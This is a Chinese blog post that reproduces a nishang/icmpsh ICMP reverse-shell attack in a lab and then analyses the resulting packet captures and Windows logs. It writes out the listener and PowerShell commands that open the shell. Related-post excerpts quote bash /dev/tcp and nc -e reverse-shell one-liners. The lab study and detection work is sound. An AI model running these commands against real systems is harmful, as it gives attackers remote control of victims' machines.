nishangICMP反弹shell攻击日志分析

最新推荐文章于 2024-04-23 21:45:00 发布
最新推荐文章于 2024-04-23 21:45:00 发布
阅读量640 收藏 2
点赞数 3
分类专栏: 日志分析 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44253823/article/details/102975487
版权

ICMP包一般不被防火墙拦截,使用ICMP协议作为连接容易通过防火墙。

攻击过程复现。

复现环境

win7:192.168.0.73。powershell导入nishang框架。 https://blog.csdn.net/weixin_44253823/article/details/102972355

kali:192.168.0.162。安装icmpsh工具。  https://github.com/inquisb/icmpsh.git

进入kali中icmpsh目录下,输入命令sysctl -w net.ipv4.icmp_echo_ignore_all=1来禁止ICMP回显。

输入命令 ./icmpsh_m.py 192.168.0.162 192.168.0.73来启动监听,同时打开wireshark抓包。

在win7中打开powershell并导入nishang框架。

输入命令Invoke-PowerShellIcmp -IPAddress 192.168.0.162并执行。

在kali中拿到shell。

由于在桥接模式下,wireshark抓取到数据过多。因此改为net模式,在net模式下继续实验。

win7IP:192.168.131.135

kali  IP:192.168.131.145

从报文可以看出数据通过ICMP协议传输,并且可以看到命令执行。

对windows日志进行查看,发现powershell程序进程。

拿到shell有进行文件夹创建工作,查找aaa可以发现创建用户以及时间。


 

芷若。
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
我眼中的nishangICMP反弹shell攻击
ovowovo的博客
11-29 416
准备 靶机Windows10 IP 192.168.0.164 攻击机kali IP 192.168.0.159 靶机下载好nishang 下载链接https://github.com/samratashok/nishang 攻击机下载好icmpsh 下载链接https://github.com/inquisb/icmpsh.git 1.先查看两个机子是否能ping通 在这里插入图片描述 2.用...
nishangICMP反弹shell攻击
wodepzw的博客
11-19 288
准备 靶机Windows10 IP 192.168.0.164 攻击机kali IP 192.168.0.159 靶机下载好nishang 下载链接https://github.com/samratashok/nishang 攻击机下载好icmpsh 下载链接https://github.com/inquisb/icmpsh.git 1.先查看两个机子是否能ping通 2.用管理员权限打开powe...
网络安全-反弹shell详解(攻击,检测与防御)
最新发布
2401_84466336的博客
04-23 3201
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
反弹shell
weixin_30797027的博客
06-01 377
1. 关于反弹shell 就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 2. 反弹shell的原因 通常用于被控端因防火墙受限、权限不足、端口被占用等情形 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者...
nishang反弹shell多种方式攻击——win10
Stephen Wolf
11-13 1076
一、nishang时基于powershell的渗透测试工具,需要powershell的版本达到3.0及以上。推荐win10版本电脑或windowsserver2008以上版本服务器 1、win10上直接以管理员身份运行 2、运行后开始导入nishang框架,导入前需先下载nishang。下载地址:https://github.com/samratashok/nishang(由于win10自...
apache-CVE-2021-41773[42013]-反弹shell
csd_ct的专栏
02-06 1805
CVE-2021-41773-反弹shell apache-CVE-2021-41773/42013 中存在RCE,可远程执行代码,本想利用bash反弹一个shell,奈何一直没有成功 ‘’’ bash -i >& /de/tcp/ip/port 0>&1 ‘’’ 经典的bash反弹,确定环境和语句都没问题后,本地查看了靶机的日志,看到有如下报错, 很奇怪,为什么会有一个syntax error:Bad fd number的错误呢,而在本地kali中直接执行该语句,是没有问题的
Shell+Linux命令实现日志分析
09-15
在Linux系统中,Shell脚本配合各种命令工具可以实现高效且灵活的日志分析。本文将详细介绍如何利用Shell和Linux命令来实现日志分析,特别是针对访问日志的统计。 1. 列出当天访问次数最多的IP: 使用`cut`命令以...
Shell日志分析常用命令和例子
09-15
Shell日志分析是一种常见的系统监控和故障排查方法,尤其在IT运维中不可或缺。通过Shell命令,我们可以高效地处理和解析日志文件,提取关键信息。本文将详细介绍一些常用的Shell命令及其在日志分析中的应用。 1. **...
Shell脚本实现分析apache日志中ip所在的地区
09-15
本篇文章将介绍如何使用Shell脚本结合nali工具来分析Apache日志中的IP地址,以确定这些IP所在的地理位置。 首先,我们需要安装nali工具。nali是一个小巧的命令行工具,它可以快速地查询一个IP地址并返回其所在国家...
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
ICMP shell
weixin_30670965的博客
04-22 499
场景 反向shell的场景下使用 原理 ICMP作为获取反向shell的通道 实践 运行 run.sh报错,可能是因为用的Parrot。改一下就可以了 ifconfig | grep 'inet '| grep -v '127.0.0.1' | awk '{ print $2}' 或者直接运行主要命令。 攻击者机器运行: sysctl -w net.ipv4.icmp_echo_ign...
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口
计算机网络ICMP实验记录和总结
jachinleon的博客
12-02 2801
Ping 程序生成的 ICMP 消息;Traceroute 程序生成的 ICMP 消息;ICMP 消息的格式和内容。这次实验中,我先对于实验资料内容进行学习,初步了解了实验的要求和步骤后,发现这次的材料不仅是包含许多生词的全英文文档,而且涉及的抓包软件版本非常旧,无法立刻上手先下载要用的platform,确定当前版本;查阅英文字典,确定实验要求文档具体内容和思路;寻找辅助教程,确保自己可以按照实验教程思路,使用新版本软件完成实验在实验中,我观察到这次实验是一个循序渐进的探索过程,
icmp协议_利用ICMP(icmpsh)协议反弹Shell 渗透红队笔记
weixin_39872257的博客
12-01 343
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 十篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),每周一更。ICMP隧道‍ICMP隧道是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定要开放端口,而在ICMP协议下就不需要。最常见的ICMP消息为Ping命令的回复,攻击者可以利用命令得到比回复更多的ICMP请求。在通常情况下...
隐藏通信隧道技术之icmpsh反弹shell(网络层ICMP隧道)
bring_coco的博客
01-05 776
优势:不需要开放端口就能通信 常见ICMP的消息是ping命令,通过ping可以得到一些回复 如果HTTP,DNS正反向端口转发不行时候可以尝试ICMP隧道 建立基础:只要能ping通,可以将TCP/UDP数据封装到数据包中,然后利用ping的数据包来穿透防火墙。 实验环境: 1.虚拟机中进行 (kali作为外网机器,monowall1是分隔内外网的防火墙,win7,win2012是两台内网机器) 2.kali的ip:10.0.78.29 Monowall1的ip:1.1.1.1 Win7的ip:1.1.
linux检测反弹shell
weixin_43781139的博客
02-25 2266
1、bash -i >& /dev/tcp/192.168.110.78/6767 0>&1 可以看到bash -i的输入输出和错误输出全部定位到了一个socket上 我们lsof看一下bash进程 我们可以看到bash远程指向一个ip,那我们完全可以判定这是一个反弹shell。 2、nc -e /usr/bin/bash 192.168.110.78 6767 这里我们看到bash的输入输出都定位到了管道上,而这个管道指向父进程nc,而且这两个...
ICMPSH的学习ICMP反弹shell
来到了学渣的博客
06-04 1358
ICMP隧道 最常见的ping命令就是利用的ICMP协议,使用该协议反弹shell,两台机器不需要开放端口,ICMP隧道简单好用。 实验环境 Kali 192.168.10.144 win7 192.168.10.129 kali安装好icmpsh工具 root@kali:~# git clone https://github.com/inquisb/icmpsh.git 安装icmpsh的依赖包 root@kali:~# apt-get install python-impacket 执行之前最重要
zabbix 测试shell_利用icmp协议反弹shell
weixin_39636718的博客
01-10 503
介绍有时候,网络管理员使用各种各样的防火墙,对渗透测试是非常困难的,有种这样防火墙:一个允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。当你已经拥有一台机器内部网络或者DMZ的一部分。他并非通过TCP来获得reverse shell的,所以不考虑绑定shell。然而有关UDP,通常是一个DNS隧道或通过ICMP的渠道来获得一个reverse shell。而...
shell 截取ip地址最后一位_利用icmpsh建立icmp隧道反弹shell
weixin_30128407的博客
12-01 147
首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git我们可以直接用git克隆过来git clone https://github.com/inquisb/icmpsh.git然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP等协议的访问pip2 install impacket接下来我...
如何防范反弹shell
06-08
5. 监控系统日志:对系统日志进行监控,及时发现异常行为和攻击,可以帮助及时采取相应措施,防止攻击者利用反弹shell攻击。 以上措施并不能完全避免反弹shell攻击,但可以降低攻击者的成功率,增加攻击者的攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值